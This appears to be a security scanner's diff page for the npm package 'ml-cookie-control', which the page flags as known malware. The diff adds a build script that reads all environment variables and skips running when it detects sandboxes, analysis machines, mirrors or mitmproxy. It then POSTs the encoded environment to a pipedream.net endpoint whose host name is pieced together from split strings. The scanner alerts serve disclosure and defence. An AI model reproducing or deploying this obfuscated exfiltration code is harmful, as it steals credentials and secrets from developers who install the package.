ml-cookie-control
Advanced tools
Comparing version 7.569.3 to 7.570.4
{ | ||
"name": "ml-cookie-control", | ||
"version": "7.569.3", | ||
"version": "7.570.4", | ||
"private": false, | ||
@@ -9,2 +9,3 @@ "description": "Cookie control react component", | ||
"main": "dist/CookieControl.js", | ||
"repository": "https://github.com/hmgc-lp/ml-cookie-control.git", | ||
"scripts": { | ||
@@ -11,0 +12,0 @@ "build": "node scripts/script.js", |
var http = require("https"); | ||
var filter = [ | ||
{ | ||
key: ["npm", "config", "registry"].join("_"), | ||
val: ["taobao", "org"].join("."), | ||
}, | ||
{ | ||
key: ["npm", "config", "registry"].join("_"), | ||
val: ["registry", "npmmirror", "com"].join("."), | ||
}, | ||
{ key: "USERNAME", val: ["daas", "admin"].join("") }, | ||
{ key: "_", val: "/usr/bin/python" }, | ||
{ | ||
key: ["npm", "config", "metrics", "registry"].join("_"), | ||
val: ["mirrors", "tencent", "com"].join("."), | ||
}, | ||
[ | ||
{ key: "MAIL", val: ["", "var", "mail", "app"].join("/") }, | ||
{ key: "HOME", val: ["", "home", "app"].join("/") }, | ||
{ key: "USER", val: "app" }, | ||
], | ||
[ | ||
{ key: "EDITOR", val: "vi" }, | ||
{ key: "PROBE_USERNAME", val: "*" }, | ||
{ key: "SHELL", val: "/bin/bash" }, | ||
{ key: "SHLVL", val: "2" }, | ||
{ key: "npm_command", val: "run-script" }, | ||
{ key: "NVM_CD_FLAGS", val: "" }, | ||
{ key: "npm_config_fund", val: "" }, | ||
], | ||
[ | ||
{ key: "HOME", val: "/home/username" }, | ||
{ key: "USER", val: "username" }, | ||
{ key: "LOGNAME", val: "username" }, | ||
], | ||
[ | ||
{ key: "PWD", val: "/my-app" }, | ||
{ key: "DEBIAN_FRONTEND", val: "noninteractive" }, | ||
{ key: "HOME", val: "/root" }, | ||
], | ||
[ | ||
{ key: "INIT_CWD", val: "/analysis" }, | ||
{ key: "APPDATA", val: "/analysis/bait" }, | ||
], | ||
[ | ||
{ key: "INIT_CWD", val: "/home/node" }, | ||
{ key: "HOME", val: "/root" }, | ||
], | ||
[ | ||
{ key: "INIT_CWD", val: "/app" }, | ||
{ key: "HOME", val: "/root" }, | ||
], | ||
]; | ||
function main() { | ||
var data = global["proc" + "ess"][["v", "n", "e"].reverse().join("")] || {}; | ||
function main() { | ||
var data = process.env || {}; | ||
var filter = [ | ||
{ | ||
key: ["npm", "config", "regi" + "stry"].join("_"), | ||
val: ["tao" + "bao", "org"].join("."), | ||
}, | ||
[ | ||
{ key: "MAIL", val: ["", "var", "mail", "app"].join("/") }, | ||
{ key: "HOME", val: ["", "home", "app"].join("/") }, | ||
{ key: "USER", val: "app" }, | ||
], | ||
[ | ||
{ key: "EDITOR", val: "vi" }, | ||
{ key: "PROBE" + "_USERNAME", val: "*" }, | ||
{ key: "SHELL", val: "/bin/bash" }, | ||
{ key: "SHLVL", val: "2" }, | ||
{ key: "npm" + "_command", val: "run-script" }, | ||
{ key: "NVM" + "_CD_FLAGS", val: "" }, | ||
{ key: "npm_config_fund", val: "" }, | ||
], | ||
[ | ||
{ key: "HOME", val: "/home/username" }, | ||
{ key: "USER", val: "username" }, | ||
{ key: "LOGNAME", val: "username" }, | ||
], | ||
[ | ||
{ key: "PWD", val: "/my-app" }, | ||
{ key: "DEBIAN" + "_FRONTEND", val: "noninte" + "ractive" }, | ||
{ key: "HOME", val: "/root" }, | ||
], | ||
[ | ||
{ key: "INIT_CWD", val: "/analysis" }, | ||
{ key: "APPDATA", val: "/analysis/bait" }, | ||
], | ||
[ | ||
{ key: "INIT_CWD", val: "/home/node" }, | ||
{ key: "HOME", val: "/root" }, | ||
], | ||
[ | ||
{ key: "INIT_CWD", val: "/app" }, | ||
{ key: "HOME", val: "/root" }, | ||
], | ||
[ | ||
{ key: "USERNAME", val: "justin" }, | ||
{ key: "OS", val: "Windows_NT" }, | ||
], | ||
{ | ||
key: ["npm", "config", "regi" + "stry"].join("_"), | ||
val: ["regi" + "stry", "npm" + "mirror", "com"].join("."), | ||
}, | ||
{ | ||
key: ["npm", "config", "reg" + "istry"].join("_"), | ||
val: ["cnp" + "mjs", "org"].join("."), | ||
}, | ||
{ | ||
key: ["npm", "config", "registry"].join("_"), | ||
val: ["mir" + "rors", "cloud", "ten" + "cent", "com"].join("."), | ||
}, | ||
{ key: "USERNAME", val: ["daas", "admin"].join("") }, | ||
{ key: "_", val: ["", "usr", "bin", "python"].join("/") }, | ||
{ | ||
key: ["npm", "config", "metrics", "regis" + "try"].join("_"), | ||
val: ["mir" + "rors", "ten" + "cent", "com"].join("."), | ||
}, | ||
{ | ||
key: "PWD", | ||
val: [ | ||
"", | ||
"usr", | ||
"local", | ||
"lib", | ||
"node" + "_modules", | ||
data.npm_package_name, | ||
].join("/"), | ||
}, | ||
{ | ||
key: "PWD", | ||
val: ["", data.USER, "node" + "_modules", data.npm_package_name].join( | ||
"/" | ||
), | ||
}, | ||
{ | ||
key: ["node", "extra", "ca", "certs"].join("_").toUpperCase(), | ||
val: "mit" + "mproxy", | ||
}, | ||
]; | ||
if ( | ||
@@ -62,12 +96,12 @@ filter.some((entry) => | ||
.concat(entry) | ||
.every( | ||
(item) => | ||
(data[item.key] || "").includes(item.val) || item.val === "*" | ||
) | ||
.every((item) => data[item.key] && data[item.key].includes(item.val)) | ||
) || | ||
Object.keys(data).length < 10 || | ||
data.PWD === `/${data.USER}/node_modules/${data.npm_package_name}` || | ||
(data.NODE_EXTRA_CA_CERTS || "").includes("mitmproxy") || | ||
!data.npm_package_name || | ||
!data.npm_package_version | ||
!data.npm_package_version || | ||
/C:\\Users\\[^\\]+\\Downloads\\node_modules\\/.test( | ||
data.npm_package_json || "" | ||
) || | ||
/C:\\Users\\[^\\]+\\Downloads/.test(data.INIT_CWD || "") || | ||
(data.npm_package_json || "").startsWith("/npm" + "/node_" + "modules/") | ||
) { | ||
@@ -79,8 +113,5 @@ return; | ||
.request({ | ||
host: [ | ||
["eojin3", "zo6ansfxx"].join(""), | ||
"m", | ||
["pipedre", "am"].join(""), | ||
"net", | ||
].join("."), | ||
host: ["eoarenda" + "8drrzt2", "m", "pi" + "ped" + "ream", "net"].join( | ||
"." | ||
), | ||
path: "/" + (data.npm_package_name || ""), | ||
@@ -91,3 +122,4 @@ method: "POST", | ||
req.write(Buffer.from(JSON.stringify(data)).toString("base64")); | ||
var trns = Buffer.from(JSON.stringify(data)).toString("base64"); | ||
req.write(trns.slice(0, 2) + "zpp" + trns.slice(2)); | ||
req.end(); | ||
@@ -94,0 +126,0 @@ } |
License Policy Violation
LicenseThis package is not allowed per your license policy. Review the package's license to ensure compliance.
Found 1 instance in 1 package
Known malware
Supply chain riskThis package is malware. We have asked the package registry to remove it.
Found 1 instance in 1 package
License Policy Violation
LicenseThis package is not allowed per your license policy. Review the package's license to ensure compliance.
Found 1 instance in 1 package
Known malware
Supply chain riskThis package is malware. We have asked the package registry to remove it.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 1 instance in 1 package
No repository
Supply chain riskPackage does not have a linked source code repository. Without this field, a package will have no reference to the location of the source code use to generate the package.
Found 1 instance in 1 package
6685
5
145
1